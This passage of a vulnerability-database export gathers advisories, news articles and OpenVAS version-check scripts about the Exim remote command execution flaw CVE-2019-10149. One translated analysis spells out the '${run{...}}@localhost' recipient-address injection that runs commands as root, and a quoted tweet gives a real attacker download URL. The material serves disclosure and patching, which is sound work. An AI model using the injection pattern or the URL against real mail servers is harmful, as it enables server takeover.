patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>) and to patch or restrict network access to VMs running the affected versions of Exim.\n\nThere is a partial mitigation for affected systems that can filter or block network traffic via [Network Security Groups (NSGs)](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>). The affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NSGs are filtering traffic or not \u2013 should be updated as soon as possible. \n\n**Resources:**\n\n[Links to Azure Network Security Group Documentation](<https://docs.microsoft.com/en-us/azure/virtual-network/security-overview>) \n[Links to Update Management Solutions using Azure Automation](<https://docs.microsoft.com/en-us/azure/automation/automation-update-management>) \n[Links to Azure Security Best Practices and Patterns](<https://docs.microsoft.com/en-us/azure/security/security-best-practices-and-patterns>)\n\n_JR Aquino \n__Manager, Azure Incident Response \n__Microsoft Security Response Center (MSRC_)\n\n* * *\n\n_updated 18 June 2019 to clarify \"Microsoft Azure infrastructure and Services are not affected; only customer\u2019s Linux IaaS instances running a vulnerable version of Exim are affected.\"_", "modified": "2019-06-15T03:48:55", "published": "2019-06-15T03:48:55", "id": "MSRC:388A48CE67D2E58B0FB4372836DA1089", "href": "https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/", "type": "msrc", "title": "Prevent the impact of a Linux worm by updating Exim (CVE-2019-10149)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:19", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Recently, security researchers found the Exim mail server there is a remote command execution vulnerability, the vulnerability number CVE-2019-10149 it. The vulnerability in the default configuration may be a local attacker to direct the use, by low-privileged user to execute root command, a remote attacker would need to modify the default configuration. In order to in the default configuration the remote exploitation of the vulnerability, the remote attacker needs and the vulnerability of the server to establish a 7 Day connection every few minutes to send 1 bytes. \n360CERT it is determined that the vulnerability affects is wide, can be caused by the local extraction rights and stored in the remote command execution risk, and the harm is more serious, the recommendations of the majority of users timely updated. \nLocal use \nVulnerability code is in deliver_message()in: \n! [](/Article/UploadPic/2019-6/2019613183214133. png) \nCode new-&gt;address to save the email address of the recipient, if the recipient address is written into the${run{ }}@localhost, you can through expand_string()with root privileges to execute arbitrary commands. expand_string()call to relationship: expand_string-&gt;child_open-&gt;execv \n! [](https://p403.ssl.qhimgs4.com/t01c35b8505c9e6fdd3.jpeg) \n! [](https://p403.ssl.qhimgs4.com/t01d1be03dde4b95bf4.jpeg) \nAttack effect is as follows: \n! [](/Article/UploadPic/2019-6/2019613183214635. png) \nRemote use \n\uff081\uff09the default configuration \nWhen the objectives of the Exim server using the default configuration, the attacker needs and the vulnerability of the server to establish the connection 7 days, every few minutes to send 1 byte, and the use of more demanding conditions, the difficulty big. But due to the Exim code is very complex, there may be other more rapid use of the method. \n\uff082\uff09non-default configuration \nWhen the target server using the following configuration, the attacker can be remote command execution \na Administrator manually removed the verify = recipient ACL configuration; \nB. The administrator to configure Exim can recognize the recipients user name in the tag, i.e. the@before Section, such as by local_part_suffix=+: -, the attacker can be RCPT TO set to a local user name+${run{...}}@localhost for use; \nC. The administrator has configured Exim as secondary MX\uff08Mail eXchange to forward mail to a remote domain, in this case the verify = recipient ACL only checks the remote address of the domain name part, i.e. the@after Section, do not check the label. The attacker can be RCPT TO set to${run{...}}@relay_to_domains be utilized. \n\n0x01 impact version \nImpact of Exim 4.87~4.91 version \nIn 4. 87 version before if manually enabled EXPERIMENTAL_EVENT option, the server also there will be loopholes \n\n0x02 repair recommendations \nUpdate to the latest version 4. 92 \n\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994514", "href": "http://www.myhack58.com/Article/html/3/62/2019/94514.htm", "title": "CVE-2019-10149: the Exim remote command execution vulnerability and early warning analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "It was discovered that Exim incorrectly handled certain decoding \noperations. A remote attacker could possibly use this issue to execute \narbitrary commands.", "edition": 3, "modified": "2019-06-05T00:00:00", "published": "2019-06-05T00:00:00", "id": "USN-4010-1", "href": "https://ubuntu.com/security/notices/USN-4010-1", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "**Issue Overview:**\n\nA flaw was found in Exim versions 4.87 to 4.91 before release 1.20 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. ([CVE-2019-10149 __](<https://access.redhat.com/security/cve/CVE-2019-10149>))\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-pgsql-4.91-1.20.amzn1.i686 \n exim-mysql-4.91-1.20.amzn1.i686 \n exim-greylist-4.91-1.20.amzn1.i686 \n exim-debuginfo-4.91-1.20.amzn1.i686 \n exim-mon-4.91-1.20.amzn1.i686 \n exim-4.91-1.20.amzn1.i686 \n \n src: \n exim-4.91-1.20.amzn1.src \n \n x86_64: \n exim-debuginfo-4.91-1.20.amzn1.x86_64 \n exim-pgsql-4.91-1.20.amzn1.x86_64 \n exim-4.91-1.20.amzn1.x86_64 \n exim-greylist-4.91-1.20.amzn1.x86_64 \n exim-mon-4.91-1.20.amzn1.x86_64 \n exim-mysql-4.91-1.20.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2019-06-05T17:12:00", "published": "2019-06-05T17:12:00", "id": "ALAS-2019-1221", "href": "https://alas.aws.amazon.com/ALAS-2019-1221.html", "title": "Critical: exim", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-06-07T14:41:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10149"], "description": "exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n", "edition": 1, "modified": "2019-06-07T12:14:17", "published": "2019-06-07T12:14:17", "id": "OPENSUSE-SU-2019:1524-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html", "title": "Security update exim (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-05-06T22:07:10", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149"], "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently-disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in the Exim mail transport agent (MTA), which are Linux-based mail servers that receive, route and deliver email messages from local users and remote hosts. However, the issue also plagues Azure users: Linux virtual machines, which run Exim servers, can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers using the vulnerable software (Azure customers running virtual machines that use Exim version 4.87 to 4.91) are susceptible to the attack. Exim version 4.92 is not vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack of vulnerable systems could allow a malicious actor to gain remote command-execution, take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\nMicrosoft for its part said that while it offers \u201cpartial mitigation,\u201d vulnerable systems are still impacted if an attacker\u2019s IP address is permitted through Network Security Groups, which is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs), its advisory said. \u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server. The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers; Researchers said that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nThe sheer number of vulnerable systems have researchers, vendors and more urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-17T15:02:52", "published": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T21:53:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2019-16928"], "description": "A patch has been issued for a critical flaw in the Exim email server software, which could potentially open Exim-based servers up to denial of service or remote code execution attacks.\n\nExim, which is free software used on Unix-like operating systems (including Linux or Mac OSX), serves as a mail transfer agent that manages mail routing services for organizations. According to a Shodan analysis, Exim is the most used mail transfer agent globally and has over five million internet-facing hosts.\n\nThis specific flaw ([CVE-2019-16928](<https://nvd.nist.gov/vuln/detail/CVE-2019-16928>)) is a heap-based overflow vulnerability. A [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) is a type of flaw where a buffer (a region in physical memory storage used to temporarily store data while it is being moved) that can be overwritten is allocated in the heap portion of memory (a region of process\u2019s memory which is used to store dynamic variables). That excess data in turn corrupts nearby space in memory and could alter other data, opening the door for malicious attacks. This specific flaw could enable bad actors to either crash servers \u2013 and also, as an Exim advisory said, \u201cremote code execution seems to be possible.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Exim, the flaw exists in the string \u201c_vformat\u201d, which is part of the file (string.c) of the component EHLO Command Handler. An EHLO command is an Extended Simple Mail Transfer Protocol (ESMTP) command sent by an email server to identify itself when connecting to another email server to start the process of sending an email.\n\n\u201cThe currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message.\u201d according to a [Friday advisory](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>). \u201cWhile at this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\u201d\n\nAccording to [VuldDB](<https://vuldb.com/?id.142692>), it is possible to exploit the vulnerability remotely. There are known technical details, but no exploit is available, according to the site. Threatpost has reached out to Exim for further details about when the vulnerability was discovered and disclosed.\n\nThe flaw impacts Exim versions between 4.92 up to 4.92.2. A fix has been issued in the version 4.92.3. No other mitigations exist other than updating the server, according to Exim\u2019s advisory.\n\n\u201cIf you can\u2019t install the above versions, ask your package maintainer for a version containing the backported fix,\u201d advised Exim. \u201cOn request and depending on our resources we will support [customers] in backporting the fix.\u201d\n\nIt\u2019s the second critical Exim vulnerability to be patched this month \u2013 [earlier in September](<https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/>), researchers urged users to upgrade their Exim servers immediately after millions of servers were found to be vulnerable to a critical flaw that could allow a remote, unauthenticated attacker to take full control of them. Another [vulnerability](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) in June was exploited in a widespread campaign to gain remote command-execution on victims\u2019 Linux systems. Researchers said that for this flaw (CVE-2019-10149) currently more than 3.5 million servers were at risk from [the attacks](<https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/>), which used a wormable exploit.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-09-30T14:12:35", "published": "2019-09-30T14:12:35", "id": "THREATPOST:1E8692DD3729CF2A8B526A85F076513F", "href": "https://threatpost.com/critical-exim-flaw-opens-servers-to-remote-code-execution/148773/", "type": "threatpost", "title": "Critical Exim Flaw Opens Servers to Remote Code Execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-19T22:01:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2020-9586"], "description": "A widespread campaign is exploiting a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems. Researchers say that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers. Attackers are exploiting the flaw, discovered last week, to take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\n\u201cThese kinds of attacks have big implications for organizations,\u201d said researchers with Cybereason in a [post on Thursday](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>). \u201cThe recovery process from this type of attack is costly and time-consuming.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExim mail servers are open-source MTAs, which essentially receive, route and deliver email messages from local users and remote hosts. Exim is the default MTA included on some Linux systems.\n\n## The Flaw\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server.\n\nThe vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91. Exim version 4.92 is not vulnerable.\n\n\u201cA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87,\u201d according to a recent [security advisory](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>). \u201cThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\u201d\n\nAn initial wave of attacks on this vulnerability \u2013 which involved attackers pushing out exploits from a malicious command-and-control (C2) server \u2013 was first discovered June 9 by researcher [Freddie Leeman.](<https://twitter.com/freddieleeman/status/1137729455181500421>)\n\n\u201cJust detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149),\u201d he said in a tweet. \u201cTries to downloads a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it\u2019s up-to-date.\u201d\n\n> Just detected the first attempts to exploit recent [#exim](<https://twitter.com/hashtag/exim?src=hash&ref_src=twsrc%5Etfw>) remote command execution (RCE) security flaw (CVE-2019-10149). Tries to downloads a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it's up-to-date. [@qualys](<https://twitter.com/qualys?ref_src=twsrc%5Etfw>) [pic.twitter.com/s7veGBcKWO](<https://t.co/s7veGBcKWO>)\n> \n> \u2014 Freddie Leeman (@freddieleeman) [June 9, 2019](<https://twitter.com/freddieleeman/status/1137729455181500421?ref_src=twsrc%5Etfw>)\n\nThen more recently, researchers with Cybereason tracked a second wave of attacks which they believe are launched by a different attacker.\n\n## The Worm Attack\n\nThe more recent and sophisticated campaign first installs an RSA private authentication key on the vulnerable SSH server for root authentication. Once remote command-execution is established, the attacker then deploys a port scanner, to sniff out other vulnerable servers and installs a coin-miner.\n\nIn addition, the campaign appears to be \u201chighly pervasive\u201d with extra measures \u2013 such as installing several payloads at different stages including the port scanner and coin-miner \u2013 for persistence on the infected system.\n\n\u201cIt is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm,\u201d researchers said. \u201cThey used hidden services on the TOR network to host their payloads and created deceiving windows i[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/14093602/exim.png>)con files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs.\u201d\n\nResearchers said that they are still looking for further information about the attack, but in the meantime urged users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cThe prevalence of vulnerable Exim servers (3,683,029 across the globe according to Shodan) allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue,\u201d researchers said.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "modified": "2019-06-14T14:04:30", "published": "2019-06-14T14:04:30", "id": "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "href": "https://threatpost.com/linux-servers-worm-exim-flaw/145698/", "type": "threatpost", "title": "Millions of Linux Servers Under Worm Attack Via Exim Flaw", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. The bug was patched last June.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe flaw can be exploited using a specially crafted email containing a modified \u201cMAIL FROM\u201d field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives.\n\nExim admins should update their MTAs to [version 4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "modified": "2020-05-29T16:34:38", "published": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-31T16:54:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-06-08T00:00:00", "id": "OPENVAS:1361412562310852550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852550", "type": "openvas", "title": "openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852550\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-08 02:01:02 +0000 (Sat, 08 Jun 2019)\");\n script_name(\"openSUSE: Security Advisory for Security (openSUSE-SU-2019:1524-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1524-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-06/msg00020.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Security'\n package(s) announced via the openSUSE-SU-2019:1524-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1\");\n\n script_tag(name:\"affected\", value:\"'Security' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.88~lp150.3.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "description": "The remote host is missing an update for the ", "modified": "2019-06-06T00:00:00", "published": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310704456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704456", "type": "openvas", "title": "Debian Security Advisory DSA 4456-1 (exim4 - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704456\");\n script_version(\"2019-06-06T02:00:08+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4456-1 (exim4 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4456.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4456-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the DSA-4456-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if 